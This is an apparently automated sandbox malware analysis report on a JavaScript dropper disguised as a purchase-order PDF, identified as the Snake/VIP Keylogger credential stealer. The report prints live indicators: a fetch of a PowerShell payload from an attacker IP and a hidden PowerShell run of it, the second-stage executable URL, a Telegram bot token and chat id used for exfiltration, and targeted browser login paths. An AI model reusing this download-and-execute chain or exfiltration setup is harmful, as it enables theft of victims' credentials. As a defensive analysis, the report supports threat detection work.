Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-2513203-PDF.js

Overview

General Information

Sample name:PO-2513203-PDF.js
Analysis ID:1637032
MD5:906b55eae679c02012dfa19c9df27e4b
SHA1:1bdaf20e8504d85b1e72dd7ca29618cd8180fac0
SHA256:e50337355671948435c054c46ff0ab2bc1acb920414842e34f1203c40ac7464b
Tags:jsSnakeKeyloggeruser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
JavaScript source code contains functionality to generate code involving a shell, file or stream
Potential obfuscated javascript found
Powershell drops PE file
Sample uses string decryption to hide its real strings
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SGDT)
Contains functionality to detect virtual machines (SIDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7272 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-2513203-PDF.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7912 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • x.exe (PID: 8060 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: FC2AA7BEED400468B816DB83CF00815D)
        • x.exe (PID: 2424 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: FC2AA7BEED400468B816DB83CF00815D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7692968455:AAFUd6DDUCm9bBSVBpp5I0Oudm0YDdn6C3o", "Chat id": "6163418482"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7692968455:AAFUd6DDUCm9bBSVBpp5I0Oudm0YDdn6C3o", "Chat_id": "6163418482", "Version": "4.4"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    dump.pcapWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
    • 0x5235c:$a1: get_encryptedPassword
    • 0x526cb:$a2: get_encryptedUsername
    • 0x5216c:$a3: get_timePasswordChanged
    • 0x52275:$a4: get_passwordField
    • 0x52372:$a5: set_encryptedPassword
    • 0x53c96:$a7: get_logins
    • 0x53bf9:$a10: KeyLoggerEventArgs
    • 0x53734:$a11: KeyLoggerEventArgsEventHandler

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000B.00000002.2538337454.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
          0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
            • 0x1e00a:$a1: get_encryptedPassword
            • 0x1e333:$a2: get_encryptedUsername
            • 0x1de1a:$a3: get_timePasswordChanged
            • 0x1df23:$a4: get_passwordField
            • 0x1e020:$a5: set_encryptedPassword
            • 0x1f702:$a7: get_logins
            • 0x1f665:$a10: KeyLoggerEventArgs
            • 0x1f2ca:$a11: KeyLoggerEventArgsEventHandler
            Click to see the 22 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            10.2.x.exe.44695b0.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              10.2.x.exe.44695b0.3.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                10.2.x.exe.44695b0.3.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  10.2.x.exe.44695b0.3.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2bc9a:$a1: get_encryptedPassword
                  • 0x2bfc3:$a2: get_encryptedUsername
                  • 0x2baaa:$a3: get_timePasswordChanged
                  • 0x2bbb3:$a4: get_passwordField
                  • 0x2bcb0:$a5: set_encryptedPassword
                  • 0x2d392:$a7: get_logins
                  • 0x2d2f5:$a10: KeyLoggerEventArgs
                  • 0x2cf5a:$a11: KeyLoggerEventArgsEventHandler
                  10.2.x.exe.44695b0.3.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                  • 0x39a41:$a2: \Comodo\Dragon\User Data\Default\Login Data
                  • 0x390e4:$a3: \Google\Chrome\User Data\Default\Login Data
                  • 0x39341:$a4: \Orbitum\User Data\Default\Login Data
                  • 0x39d20:$a5: \Kometa\User Data\Default\Login Data
                  Click to see the 29 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Script Initiated Connection to Non-Local Network
                  Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 176.65.144.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7272, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49717
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-2513203-PDF.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-2513203-PDF.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-2513203-PDF.js", ProcessId: 7272, ProcessName: wscript.exe
                  Sigma detected: Script Initiated Connection
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 176.65.144.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7272, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49717
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-2513203-PDF.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-2513203-PDF.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-2513203-PDF.js", ProcessId: 7272, ProcessName: wscript.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-2513203-PDF.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7272, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1", ProcessId: 7912, ProcessName: powershell.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-13T10:21:58.364550+010020188561A Network Trojan was detected176.65.144.380192.168.2.449717TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-13T10:22:10.588743+010028033053Unknown Traffic192.168.2.449727104.21.112.1443TCP
                  2025-03-13T10:22:13.480604+010028033053Unknown Traffic192.168.2.449729104.21.112.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-13T10:22:05.613647+010028032742Potentially Bad Traffic192.168.2.449725132.226.247.7380TCP
                  2025-03-13T10:22:08.301188+010028032742Potentially Bad Traffic192.168.2.449725132.226.247.7380TCP
                  2025-03-13T10:22:11.332437+010028032742Potentially Bad Traffic192.168.2.449728132.226.247.7380TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-13T10:22:34.700827+010018100071Potentially Bad Traffic192.168.2.449742149.154.167.220443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: http://176.65.144.3/dev/believe.exeAvira URL Cloud: Label: malware
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen
                  Source: C:\Users\user\AppData\Local\Temp\RUNPEE.dllAvira: detection malicious, Label: HEUR/AGEN.1300034
                  Found malware configuration
                  Source: 0000000B.00000002.2538337454.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7692968455:AAFUd6DDUCm9bBSVBpp5I0Oudm0YDdn6C3o", "Chat id": "6163418482"}
                  Source: 0000000B.00000002.2538337454.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7692968455:AAFUd6DDUCm9bBSVBpp5I0Oudm0YDdn6C3o", "Chat_id": "6163418482", "Version": "4.4"}
                  Multi AV Scanner detection for submitted file
                  Source: PO-2513203-PDF.jsVirustotal: Detection: 17%Perma Link
                  Source: PO-2513203-PDF.jsReversingLabs: Detection: 18%
                  Sample uses string decryption to hide its real strings
                  Source: 10.2.x.exe.44695b0.3.unpackString decryptor: 7692968455:AAFUd6DDUCm9bBSVBpp5I0Oudm0YDdn6C3o
                  Source: 10.2.x.exe.44695b0.3.unpackString decryptor: 6163418482
                  Source: 10.2.x.exe.44695b0.3.unpackString decryptor:

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49726 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49742 version: TLS 1.2
                  Source: Binary string: CZG3HF22.pdbH source: x.exe, 0000000A.00000000.1404811393.0000000000842000.00000002.00000001.01000000.00000008.sdmp, x.exe.8.dr
                  Source: Binary string: CZG3HF22.pdb source: x.exe, 0000000A.00000000.1404811393.0000000000842000.00000002.00000001.01000000.00000008.sdmp, x.exe.8.dr

                  Software Vulnerabilities

                  barindex
                  JavaScript source code contains functionality to generate code involving a shell, file or stream
                  Source: PO-2513203-PDF.jsReturn value : ['WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute Pow', 'CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,W', 'WRfjWRCjbZDdCghdOmoxWQhdSa,C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8', 'WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,WScript.Shell,64ceoRBl,w1bJW5']Go to definition
                  Source: PO-2513203-PDF.jsReturn value : ['WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute Pow', 'CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,W', 'WRfjWRCjbZDdCghdOmoxWQhdSa,C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8', 'WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,WScript.Shell,64ceoRBl,w1bJW5', 'C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to exe']Go to definition
                  Source: PO-2513203-PDF.jsReturn value : ['WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute Pow', 'CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,W', 'WRfjWRCjbZDdCghdOmoxWQhdSa,C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8', 'WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,WScript.Shell,64ceoRBl,w1bJW5', 'C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to exe']Go to definition
                  Source: PO-2513203-PDF.jsReturn value : ['WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute Pow', 'CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,W', 'WRfjWRCjbZDdCghdOmoxWQhdSa,C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8', 'WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,WScript.Shell,64ceoRBl,w1bJW5', 'C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to exe']Go to definition
                  Source: PO-2513203-PDF.jsReturn value : ['WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute Pow', 'CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,W', 'WRfjWRCjbZDdCghdOmoxWQhdSa,C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8', 'WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,WScript.Shell,64ceoRBl,w1bJW5', 'C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to exe']Go to definition
                  Source: PO-2513203-PDF.jsArgument value : ['WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute Pow', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\WTRTRWFSHS.ps1"",0,true', 'CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,W', 'WRfjWRCjbZDdCghdOmoxWQhdSa,C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8', 'WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,WScript.Shell,64ceoRBl,w1bJW5', 'C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to exe']Go to definition
                  Source: PO-2513203-PDF.jsReturn value : ['WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute Pow', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\WTRTRWFSHS.ps1"",0,true', 'CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,W', 'WRfjWRCjbZDdCghdOmoxWQhdSa,C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8', 'WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,WScript.Shell,64ceoRBl,w1bJW5', 'C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to exe']Go to definition
                  Source: PO-2513203-PDF.jsReturn value : ['"WScript.Shell"', 'WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute Pow', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\WTRTRWFSHS.ps1"",0,true', 'CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,W', '"Scripting.FileSystemObject"', 'WRfjWRCjbZDdCghdOmoxWQhdSa,C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8', 'WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,WScript.Shell,64ceoRBl,w1bJW5', 'C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to exe']Go to definition
                  Suspicious execution chain found
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 00E947D7h10_2_00E94688
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 00E9482Ch10_2_00E94688
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 00ECF45Dh11_2_00ECF2C0
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 00ECF45Dh11_2_00ECF4AC
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 00ECF45Dh11_2_00ECF52F
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 00ECFC19h11_2_00ECF960
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 06842D41h11_2_06842A90
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 06843308h11_2_06842EF0
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 0684DD71h11_2_0684DAC8
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 06843308h11_2_06842EE7
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 0684D4C1h11_2_0684D218
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 06843308h11_2_06843236
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 0684D919h11_2_0684D670
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_06840673
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 0684EA79h11_2_0684E7D0
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 0684E1C9h11_2_0684DF20
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 06840D0Dh11_2_06840B30
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 068416F8h11_2_06840B30
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 0684E621h11_2_0684E378
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 0684F329h11_2_0684F080
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 0684F781h11_2_0684F4D8
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 0684EED1h11_2_0684EC28
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_06840040
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_06840853
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 0684D069h11_2_0684CDC0
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 0684FBD9h11_2_0684F930

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2018856 - Severity 1 - ET MALWARE Windows executable base64 encoded : 176.65.144.3:80 -> 192.168.2.4:49717
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49742 -> 149.154.167.220:443
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\wscript.exeNetwork Connect: 176.65.144.3 80Jump to behavior
                  JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
                  Source: PO-2513203-PDF.jsArgument value : ['"MSXML2.XMLHTTP"']Go to definition
                  Source: PO-2513203-PDF.jsArgument value : ['"GET","http://176.65.144.3/dev/believe.ps1",false']Go to definition
                  Source: PO-2513203-PDF.jsReturn value : ['WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute Pow', 'CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,W', 'WRfjWRCjbZDdCghdOmoxWQhdSa,C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8', 'WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,WScript.Shell,64ceoRBl,w1bJW5']Go to definition
                  Source: PO-2513203-PDF.jsReturn value : ['WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute Pow', 'CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute PowerShell script: ,WRWltamX,W', 'WRfjWRCjbZDdCghdOmoxWQhdSa,C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8', 'C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to exe']Go to definition
                  Source: PO-2513203-PDF.jsArgument value : ['"MSXML2.XMLHTTP","BK7$"']Go to definition
                  Source: PO-2513203-PDF.jsReturn value : ['WRfjWRCjbZDdCghdOmoxWQhdSa,C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8']Go to definition
                  Source: PO-2513203-PDF.jsArgument value : ['"http://176.65.144.3/dev/believe.ps1","C:\\Temp\\WTRTRWFSHS.ps1"']Go to definition
                  Source: PO-2513203-PDF.jsReturn value : ['WRfjWRCjbZDdCghdOmoxWQhdSa,C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8']Go to definition
                  Source: PO-2513203-PDF.jsReturn value : ['WRfjWRCjbZDdCghdOmoxWQhdSa,C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8']Go to definition
                  Source: PO-2513203-PDF.jsReturn value : ['WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to execute Pow', 'WRfjWRCjbZDdCghdOmoxWQhdSa,C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8', 'C:\\Temp,WR0Ngd/cSCoDWP5WW7FdOuf+DW,CreateTextFile,CreateFolder,WQZcRmkrv8ora8k+W4fbAW0,Failed to exe']Go to definition
                  Source: PO-2513203-PDF.jsReturn value : ['"MSXML2.XMLHTTP"']Go to definition
                  Source: PO-2513203-PDF.jsArgument value : ['"MSXML2.XMLHTTP","BK7$"']Go to definition
                  Source: PO-2513203-PDF.jsArgument value : ['"MSXML2.XMLHTTP"']Go to definition
                  Source: PO-2513203-PDF.jsArgument value : ['"http://176.65.144.3/dev/believe.ps1","C:\\Temp\\WTRTRWFSHS.ps1"']Go to definition
                  Source: PO-2513203-PDF.jsReturn value : ['"MSXML2.XMLHTTP"']Go to definition
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
